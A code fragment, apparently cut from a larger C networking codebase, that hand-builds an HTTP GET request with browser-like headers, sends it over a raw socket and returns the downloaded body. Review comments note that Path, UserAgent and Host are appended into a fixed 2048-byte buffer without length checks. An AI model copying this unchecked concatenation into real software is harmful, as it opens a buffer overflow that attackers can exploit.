    // Fixed 2048-byte request buffer; Path, UserAgent and Host are appended without length checks.
    // "GET /" is prefixed unconditionally, so the result depends on whether ParseUrl strips the
    // leading slash from Path — confirm in ParseUrl.
    char *query=(char*)MemAlloc(2048);
    m_lstrcpy(query,"GET /");
    m_lstrcat(query,Path);
    m_lstrcat(query," HTTP/1.1\r\nAccept: */* \r\n ");
    m_lstrcat(query,"Accept-Language: ru \r\n");
    m_lstrcat(query,"UA-CPU: x86 \r\n");
    // gzip/deflate are advertised; whether RecvAndParse decodes a compressed body is not visible here.
    m_lstrcat(query,"Accept-Encoding: gzip, deflate \r\n");
    m_lstrcat(query,"User-Agent: ");
    m_lstrcat(query,UserAgent);
    m_lstrcat(query,"\r\nHost: ");
    m_lstrcat(query,Host);
    m_lstrcat(query,"\r\nConnection: Close\r\n\r\n\r\n");
    bool b = MySend( Socket, (const char *)query, m_lstrlen( query ) );
    MemFree( Host );
    //MemFree( Path );
    MemFree( UserAgent );
    MemFree( query );
    if ( !b )
    {
        return false;
    }
    DWORD dwSizeFile = 0;
    char *Buffer = RecvAndParse( Socket, &dwSizeFile );
    if ( !Buffer )
    {
        pclosesocket( Socket );
        return false;
    }
    if ( dwSize )
    {
        *lpBuffer = (LPBYTE)Buffer;
        *dwSize = dwSizeFile;
        return true;
    }
    return false;
}